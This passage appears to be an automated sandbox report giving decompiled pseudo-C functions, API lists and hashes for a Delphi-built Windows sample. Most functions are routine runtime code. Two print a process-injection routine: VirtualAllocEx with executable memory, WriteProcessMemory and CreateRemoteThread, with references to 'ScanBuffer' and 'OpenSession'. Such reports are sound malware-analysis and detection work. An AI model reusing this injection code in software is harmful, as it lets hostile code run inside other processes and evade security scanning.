					}
					goto L14;
				}
			}








                                                                                                0x02175e28
                                                                                                0x02175e3b
                                                                                                0x02175e40
                                                                                                0x02175e49
                                                                                                0x02175f32
                                                                                                0x02175f39
                                                                                                0x02175e5f
                                                                                                0x02175e73
                                                                                                0x02175e78
                                                                                                0x02175e7b
                                                                                                0x02175e77
                                                                                                0x00000000
                                                                                                0x02175e77
                                                                                                0x02175e87
                                                                                                0x02175e8f
                                                                                                0x02175e95
                                                                                                0x02175e9a
                                                                                                0x02175ead
                                                                                                0x02175ec2
                                                                                                0x02175ec2
                                                                                                0x02175ec6
                                                                                                0x02175ee5
                                                                                                0x02175efa
                                                                                                0x02175efe
                                                                                                0x02175f00
                                                                                                0x02175f1b
                                                                                                0x02175f30
                                                                                                0x02175f30
                                                                                                0x02175efe
                                                                                                0x02175ec6
                                                                                                0x00000000
                                                                                                0x02175e8f

                                                                                                APIs
                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02175E28
                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02175E35
                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02175E3B
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02175E66
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EAD
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EBD
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02175EE5
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02175EF5
                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02175F1B
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02175F2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                • API String ID: 1599918012-2375825460
                                                                                                • Opcode ID: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                                                • Instruction ID: 8a02a480dd8b8b5114be851cce83bed8d61c7fd6e40b77c03ff5c47e0c0698d1
                                                                                                • Opcode Fuzzy Hash: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                                                • Instruction Fuzzy Hash: EE318471EC025C3EFB25D6B49C85FDEB7BE8B84380F5401A1AA48E6181EB74DE848F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185A40 Relevance: 3.1, APIs: 2, Instructions: 57memoryinjectionCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 56%
                                                                                                			E02185A40(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _t11;
				char _t16;
				void* _t25;
				intOrPtr _t33;
				void* _t36;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t25 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x2185ac6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E02174A98( &_v12, __edx);
				_t11 = _v12;
				if(_t11 != 0) {
					_t11 =  *((intOrPtr*)(_t11 - 4));
				}
				_t36 = VirtualAllocEx(_t38, 0, _t11 + 1, 0x3000, 0x40);
				E02174A98( &_v16, _t25);
				_t16 = _v16;
				if(_t16 != 0) {
					_t16 =  *((intOrPtr*)(_t16 - 4));
				}
				WriteProcessMemory(_t38, _t36, _t25, _t16 + 1,  &_v8);
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E02185ACD);
				return E021748C4( &_v16, 2);
			}













                                                                                                0x02185a43
                                                                                                0x02185a45
                                                                                                0x02185a47
                                                                                                0x02185a4c
                                                                                                0x02185a4e
                                                                                                0x02185a52
                                                                                                0x02185a53
                                                                                                0x02185a58
                                                                                                0x02185a5b
                                                                                                0x02185a63
                                                                                                0x02185a68
                                                                                                0x02185a6d
                                                                                                0x02185a72
                                                                                                0x02185a72
                                                                                                0x02185a85
                                                                                                0x02185a8c
                                                                                                0x02185a91
                                                                                                0x02185a96
                                                                                                0x02185a9b
                                                                                                0x02185a9b
                                                                                                0x02185aa6
                                                                                                0x02185aad
                                                                                                0x02185ab0
                                                                                                0x02185ab3
                                                                                                0x02185ac5

                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02185AC6,?,?,?,?,00000000,00000000,00000000), ref: 02185A80
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02185AC6), ref: 02185AA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                                                • String ID:
                                                                                                • API String ID: 645232735-0
                                                                                                • Opcode ID: f0c72c3926a60469874caca1a198ae091c4d39ea6cf505dfd8413f0cd3daf931
                                                                                                • Instruction ID: 21f877b95eb6256e588f094d843f4aafe8c6991cb1de780df5f62e7c4ead23e2
                                                                                                • Opcode Fuzzy Hash: f0c72c3926a60469874caca1a198ae091c4d39ea6cf505dfd8413f0cd3daf931
                                                                                                • Instruction Fuzzy Hash: 44019E757802487FF711EA658CC1F6AB7BEDB85B04F9144B5F901E7280DB70EE048A24
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217823C Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217823C(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E02175824(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E02175824(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                                                                0x02178243
                                                                                                0x02178248
                                                                                                0x0217824a
                                                                                                0x0217824a
                                                                                                0x0217825d
                                                                                                0x0217826c
                                                                                                0x0217826f
                                                                                                0x0217827c
                                                                                                0x0217827f
                                                                                                0x02178284
                                                                                                0x02178287
                                                                                                0x02178289
                                                                                                0x02178296
                                                                                                0x02178299
                                                                                                0x0217829e
                                                                                                0x021782a1
                                                                                                0x021782a3
                                                                                                0x021782ac

                                                                                                APIs
                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0217825D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpace
                                                                                                • String ID:
                                                                                                • API String ID: 1705453755-0
                                                                                                • Opcode ID: b9d40280101639a8c5387bd15563a96d03aa120393c99a54a6e33f677c5061b5
                                                                                                • Instruction ID: 3469522c7a1b83878f9179418ac7af2a13d5cf63a20b1e07df7b2f000b21c120
                                                                                                • Opcode Fuzzy Hash: b9d40280101639a8c5387bd15563a96d03aa120393c99a54a6e33f677c5061b5
                                                                                                • Instruction Fuzzy Hash: DE11D6B5E00209AF9B04CF99C881DAFF7F9EFC8310B54C569A509E7254D7319E01CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217A9B8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217A9B8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E021748F4(_t10, _t18);
				}
				return E02174990(_t10, _t5 - 1,  &_v260, _t19);
			}







                                                                                                0x0217a9c3
                                                                                                0x0217a9c5
                                                                                                0x0217a9d6
                                                                                                0x0217a9db
                                                                                                0x0217a9dd
                                                                                                0x00000000
                                                                                                0x0217a9f5
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 970b2ee4ffdceb79d1b7860d65872896ae916278293f28f4050da8f3dc609713
                                                                                                • Instruction ID: c94894e6a19845f259ab26a6c9ce2a3dcb3098ee214e22430c553edc31c53980
                                                                                                • Opcode Fuzzy Hash: 970b2ee4ffdceb79d1b7860d65872896ae916278293f28f4050da8f3dc609713
                                                                                                • Instruction Fuzzy Hash: D6E0D8717842585BD314A95C5C80DFA727DEBDC310F00427ABE59C7340EFA09DD04AE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217B938 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217B938() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x21907e4 = _v132;
					 *0x21907e8 = _v144;
					 *0x21907ec = _v140;
					if( *0x21907e4 != 1) {
						 *0x21907f0 = _v136;
					} else {
						 *0x21907f0 = _v136 & 0x0000ffff;
					}
					return E02174B10(0x21907f4, 0x80,  &_v128);
				}
				return _t7;
			}










                                                                                                0x0217b93e
                                                                                                0x0217b946
                                                                                                0x0217b94d
                                                                                                0x0217b953
                                                                                                0x0217b95c
                                                                                                0x0217b965
                                                                                                0x0217b971
                                                                                                0x0217b987
                                                                                                0x0217b973
                                                                                                0x0217b97c
                                                                                                0x0217b97c
                                                                                                0x00000000
                                                                                                0x0217b99a
                                                                                                0x0217b9a5

                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,0218F106,00000000,0218F11E), ref: 0217B946
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Version
                                                                                                • String ID:
                                                                                                • API String ID: 1889659487-0
                                                                                                • Opcode ID: 67518e739572cf5e603bc144c61e7e4976d7356c359485cc2ac49126f4ffb00e
                                                                                                • Instruction ID: 9deb4e4d961f33b055f37fa8d69cd5e0152659b539a86a2e6517d6b4f90d4f97
                                                                                                • Opcode Fuzzy Hash: 67518e739572cf5e603bc144c61e7e4976d7356c359485cc2ac49126f4ffb00e
                                                                                                • Instruction Fuzzy Hash: A2F0B7B49893029FC358DF28E540B1AB7F5EB88324F004D2DA5E8C7394E736A9558F92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217AA04 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E0217AA04(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}






                                                                                                0x0217aa07
                                                                                                0x0217aa08
                                                                                                0x0217aa1e
                                                                                                0x0217aa26
                                                                                                0x0217aa20
                                                                                                0x0217aa20
                                                                                                0x0217aa20
                                                                                                0x0217aa2c

                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0217C01E,00000000,0217C237,?,?,00000000,00000000), ref: 0217AA17
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: bb273cdce3cd20e8bf6165c07a061c1bd383eb027c3837f97ac3610f7129eeb8
                                                                                                • Instruction ID: 5dfa86f4fc8426d5a125cde211b57acec4a2776731cfa886e26d9d151d0a6a6b
                                                                                                • Opcode Fuzzy Hash: bb273cdce3cd20e8bf6165c07a061c1bd383eb027c3837f97ac3610f7129eeb8
                                                                                                • Instruction Fuzzy Hash: E4D05EA235E2A02EA314515A2E84D7F5AECCECA7A2F00443AF548C6140D300CC059772
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02179438 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02179438() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                                                                                0x0217943c
                                                                                                0x02179448

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID:
                                                                                                • API String ID: 481472006-0
                                                                                                • Opcode ID: 6dd34a849c2f346cf2e2f5751c819418c1277ca2abf746d71a13b971fa9c721c
                                                                                                • Instruction ID: e3c4c756ad91661a80db63d29355fce77fcfe0c3166096fd543d1615b8d494bf
                                                                                                • Opcode Fuzzy Hash: 6dd34a849c2f346cf2e2f5751c819418c1277ca2abf746d71a13b971fa9c721c
                                                                                                • Instruction Fuzzy Hash: 2FA01210844C2005824033180C0213530545840620FC40B5068F8402D0EA1D413094D3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021720F4 Relevance: .1, Instructions: 94COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 51%
                                                                                                			E021720F4(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}




                                                                                                0x021720f5
                                                                                                0x021720f7
                                                                                                0x02172119
                                                                                                0x02172120
                                                                                                0x02172131
                                                                                                0x0217213c
                                                                                                0x0217214d
                                                                                                0x02172158
                                                                                                0x02172169
                                                                                                0x02172174
                                                                                                0x02172185
                                                                                                0x02172190
                                                                                                0x021721a1
                                                                                                0x021721ac
                                                                                                0x021721bd
                                                                                                0x021721c8
                                                                                                0x021721d9
                                                                                                0x021721e4
                                                                                                0x021721f5
                                                                                                0x021721fd
                                                                                                0x02172206
                                                                                                0x02172208
                                                                                                0x0217220c

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217D480 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217D480() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x2194224 = E0217D454("VariantChangeTypeEx", E0217CFEC, _t91);
				 *0x2194228 = E0217D454("VarNeg", E0217D01C, _t91);
				 *0x219422c = E0217D454("VarNot", E0217D01C, _t91);
				 *0x2194230 = E0217D454("VarAdd", E0217D028, _t91);
				 *0x2194234 = E0217D454("VarSub", E0217D028, _t91);
				 *0x2194238 = E0217D454("VarMul", E0217D028, _t91);
				 *0x219423c = E0217D454("VarDiv", E0217D028, _t91);
				 *0x2194240 = E0217D454("VarIdiv", E0217D028, _t91);
				 *0x2194244 = E0217D454("VarMod", E0217D028, _t91);
				 *0x2194248 = E0217D454("VarAnd", E0217D028, _t91);
				 *0x219424c = E0217D454("VarOr", E0217D028, _t91);
				 *0x2194250 = E0217D454("VarXor", E0217D028, _t91);
				 *0x2194254 = E0217D454("VarCmp", E0217D034, _t91);
				 *0x2194258 = E0217D454("VarI4FromStr", E0217D040, _t91);
				 *0x219425c = E0217D454("VarR4FromStr", E0217D0AC, _t91);
				 *0x2194260 = E0217D454("VarR8FromStr", E0217D118, _t91);
				 *0x2194264 = E0217D454("VarDateFromStr", E0217D184, _t91);
				 *0x2194268 = E0217D454("VarCyFromStr", E0217D1F0, _t91);
				 *0x219426c = E0217D454("VarBoolFromStr", E0217D25C, _t91);
				 *0x2194270 = E0217D454("VarBstrFromCy", E0217D2DC, _t91);
				 *0x2194274 = E0217D454("VarBstrFromDate", E0217D34C, _t91);
				_t46 = E0217D454("VarBstrFromBool", E0217D3C0, _t91);
				 *0x2194278 = _t46;
				return _t46;
			}






                                                                                                0x0217d48e
                                                                                                0x0217d4a2
                                                                                                0x0217d4b8
                                                                                                0x0217d4ce
                                                                                                0x0217d4e4
                                                                                                0x0217d4fa
                                                                                                0x0217d510
                                                                                                0x0217d526
                                                                                                0x0217d53c
                                                                                                0x0217d552
                                                                                                0x0217d568
                                                                                                0x0217d57e
                                                                                                0x0217d594
                                                                                                0x0217d5aa
                                                                                                0x0217d5c0
                                                                                                0x0217d5d6
                                                                                                0x0217d5ec
                                                                                                0x0217d602
                                                                                                0x0217d618
                                                                                                0x0217d62e
                                                                                                0x0217d644
                                                                                                0x0217d65a
                                                                                                0x0217d66a
                                                                                                0x0217d670
                                                                                                0x0217d677

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0217D489
                                                                                                  • Part of subcall function 0217D454: GetProcAddress.KERNEL32(00000000), ref: 0217D46D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                • API String ID: 1646373207-1918263038
                                                                                                • Opcode ID: beffe5d74b713625b9bfd3d2e25978579cab34a52b086afe4208682f627ffbd1
                                                                                                • Instruction ID: 37ff22d6168cf3671318f6371bd874befbfe84e8774082dc33d873a23b400359
                                                                                                • Opcode Fuzzy Hash: beffe5d74b713625b9bfd3d2e25978579cab34a52b086afe4208682f627ffbd1
                                                                                                • Instruction Fuzzy Hash: AA41FE61AC520C5F62086A6DB64042777FAEFC47107B4942AB40EEFB45DF30BC96CE69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185CD8 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloadersynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02185CD8(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t17;
				void* _t19;
				void* _t26;
				long _t27;
				void* _t28;

				_t20 = __ecx;
				_t28 = __ecx;
				_t26 = __edx;
				_t19 = __eax;
				_t27 = 0;
				 *0x21944ec = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				 *0x21944e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				 *0x21944e4 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				 *0x21944f4 = E02185A40(_t19, _t19, _t20, _t28, _t26, 0);
				 *0x21944f0 = E02185A40(_t19, _t19, _t20, _t26, _t26, 0);
				 *0x21944e0 = E02185B0C(_t19, 0x21944e4, E02185CA8, 0, 0x14);
				if( *0x21944e0 != 0) {
					_t15 =  *0x21944e0; // 0x0
					WaitForSingleObject(_t15, 0xffffffff);
					_t17 =  *0x21944e0; // 0x0
					GetExitCodeThread(_t17, 0x21944f8);
					_t27 =  *0x21944f8; // 0x0
				}
				return _t27;
			}













                                                                                                0x02185cd8
                                                                                                0x02185cdc
                                                                                                0x02185cde
                                                                                                0x02185ce0
                                                                                                0x02185ce2
                                                                                                0x02185cf9
                                                                                                0x02185d13
                                                                                                0x02185d2d
                                                                                                0x02185d3b
                                                                                                0x02185d49
                                                                                                0x02185d63
                                                                                                0x02185d6f
                                                                                                0x02185d73
                                                                                                0x02185d79
                                                                                                0x02185d83
                                                                                                0x02185d89
                                                                                                0x02185d8e
                                                                                                0x02185d8e
                                                                                                0x02185d9a

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA,02194590,ScanBuffer,02194598,0218635C,OpenSession,02194598,0218635C,00000000,00000000), ref: 02185CEE
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185CF4
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA,02194590,ScanBuffer,02194598,0218635C,OpenSession,02194598), ref: 02185D08
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185D0E
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA,02194590,ScanBuffer,02194598), ref: 02185D22
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185D28
                                                                                                  • Part of subcall function 02185A40: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02185AC6,?,?,?,?,00000000,00000000,00000000), ref: 02185A80
                                                                                                  • Part of subcall function 02185A40: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02185AC6), ref: 02185AA6
                                                                                                  • Part of subcall function 02185B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                  • Part of subcall function 02185B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
